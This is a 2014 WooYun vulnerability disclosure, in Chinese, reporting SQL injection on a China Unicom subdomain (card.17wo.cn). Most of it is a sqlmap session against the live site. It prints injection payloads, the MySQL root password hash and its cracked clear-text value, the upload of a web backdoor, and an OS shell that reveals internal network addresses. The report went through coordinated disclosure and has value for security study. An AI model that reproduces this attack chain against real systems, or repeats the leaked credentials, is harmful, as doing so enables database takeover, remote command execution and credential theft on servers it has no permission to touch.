联通某分站MySQL注入ROOT权限

漏洞详情

披露状态:

2014-03-13: 细节已通知厂商并且等待厂商处理中
2014-03-19: 厂商已经确认,细节仅向厂商公开
2014-03-29: 细节向核心白帽子及相关领域专家公开
2014-04-08: 细节向普通白帽子公开
2014-04-18: 细节向实习白帽子公开
2014-04-27: 细节向公众公开

简要描述:

PHP + MYSQL注入,ROOT权限,可获得SHELL,接下来能做啥大家都知道了。

详细说明:

在乌云看到这个漏洞 WooYun: 17WO手机验证码绕过可任意修改其他用户密码 于是测试一下。漏洞依然存在,未修复。接着检查一下其他子域名的安全。



百度搜索“site:17wo.cn”一下,得到可能的注入点:http://card.17wo.cn/wap/wap_card.php?id=2548



扔给sqlmap跑一下:

./sqlmap.py --random-agent --batch --thread 10 -u 'card.17wo.cn/wap/wap_card.php?id=2548' --password

sqlmap/1.0-dev-ab36e5a - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:24:01

[14:24:01] [INFO] fetched random HTTP User-Agent header from file '/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5
[14:24:01] [INFO] resuming back-end DBMS 'mysql'
[14:24:01] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2548 AND 1953=1953

Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: id=2548 UNION ALL SELECT CONCAT(0x716c647471,0x796b6866457170574455,0x7165736271)#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=2548 AND SLEEP(5)
---
[14:24:02] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.5.3
back-end DBMS: MySQL 5.0.11
[14:24:02] [INFO] fetching database users password hashes
[14:24:02] [WARNING] reflective value(s) found and filtering out
[14:24:02] [INFO] the SQL query used returns 6 entries
[14:24:02] [INFO] starting 6 threads
[14:24:02] [INFO] retrieved: "root","*B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520"
[14:24:03] [INFO] retrieved: "",""
[14:24:03] [INFO] retrieved: "pma",""
[14:24:03] [INFO] retrieved: "",""
[14:24:03] [INFO] retrieved: "root","*B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520"
[14:24:03] [INFO] retrieved: "root",""
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[14:24:03] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[14:24:03] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[14:24:03] [INFO] starting dictionary-based cracking (mysql_passwd)
[14:24:03] [INFO] starting 4 processes
[14:24:33] [INFO] cracked password 'wise' for user 'root'
database management system users password hashes:
[*] pma [1]:
password hash: NULL
[*] root [2]:
password hash: *B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520
clear-text password: wise
password hash: NULL





直接跑出root密码。



执行个命令试试:

[14:26:46] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.5.3
back-end DBMS: MySQL 5.0.11
[14:26:46] [INFO] going to use a web backdoor for command prompt
[14:26:46] [INFO] fingerprinting the back-end DBMS operating system
[14:26:46] [WARNING] reflective value(s) found and filtering out
[14:26:46] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[14:26:46] [INFO] retrieved the web server document root: 'D:\xampp\htdocs\pailife'
[14:26:46] [INFO] retrieved web server absolute paths: 'D:/xampp/htdocs/pailife/wap/wap_card.php'
[14:26:46] [INFO] trying to upload the file stager on '/' via LIMIT INTO OUTFILE technique
[14:26:47] [WARNING] unable to upload the file stager on '/'
[14:26:47] [INFO] trying to upload the file stager on '/' via UNION technique
[14:26:48] [WARNING] expect junk characters inside the file as a leftover from UNION query
[14:26:48] [INFO] the remote file /tmpujmue.php is larger than the local file /var/folders/9g/xlxjdbd909d7z4lxrr51tj1m0000gn/T/tmpsx2Rm4
[14:26:50] [INFO] trying to upload the file stager on '/wap' via LIMIT INTO OUTFILE technique
[14:26:53] [WARNING] unable to upload the file stager on '/wap'
[14:26:53] [INFO] trying to upload the file stager on '/wap' via UNION technique
[14:26:59] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[14:27:00] [INFO] trying to upload the file stager on '/xampp/htdocs/pailife/wap' via LIMIT INTO OUTFILE technique
[14:27:03] [INFO] heuristics detected web page charset 'utf-8'
[14:27:03] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/pailife/wap' - http://card.17wo.cn:80/wap/tmpujmue.php
[14:27:06] [INFO] heuristics detected web page charset 'ascii'
[14:27:06] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/pailife/wap' - http://card.17wo.cn:80/wap/tmpboyhw.php
[14:27:06] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a] Y
[14:27:17] [INFO] heuristics detected web page charset 'GB2312'
command standard output:
---

Windows IP 配置


以太网适配器 本地连接:

连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::3cf0:d229:52:6821
IPv4 地址 . . . . . . . . . . . . : 10.123.176.75
子网掩码 . . . . . . . . . . . . : 255.255.255.224
默认网关. . . . . . . . . . . . . : 10.123.176.67

隧道适配器 本地连接* 4:

连接特定的 DNS 后缀 . . . . . . . :
IPv6 地址 . . . . . . . . . . . . : 2001:0:9d38:6ab8:b0:7d8:f584:4fb4
本地链接 IPv6 地址. . . . . . . . : fe80::b0:7d8:f584:4fb4
默认网关. . . . . . . . . . . . . : ::

隧道适配器 isatap.{DD9307C7-D162-4559-AFA6-28E9AA162058}:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
---





完全没问题。



接下来就啥都能做了...



发漏洞之前在乌云搜了一下,发现去年就有人提相关漏洞。直到现在大半年都没修复。此漏洞权当再次给当事人提个醒吧。

漏洞证明:

见详细说明

修复方案:

其一提高安全意识(那么久的漏洞都不修),其次防注入,降低权限...

版权声明:转载请注明来源 belerhacker@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-03-19 10:09

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT直接通报给中国联通集团公司处置。

最新状态:

暂无


漏洞评价: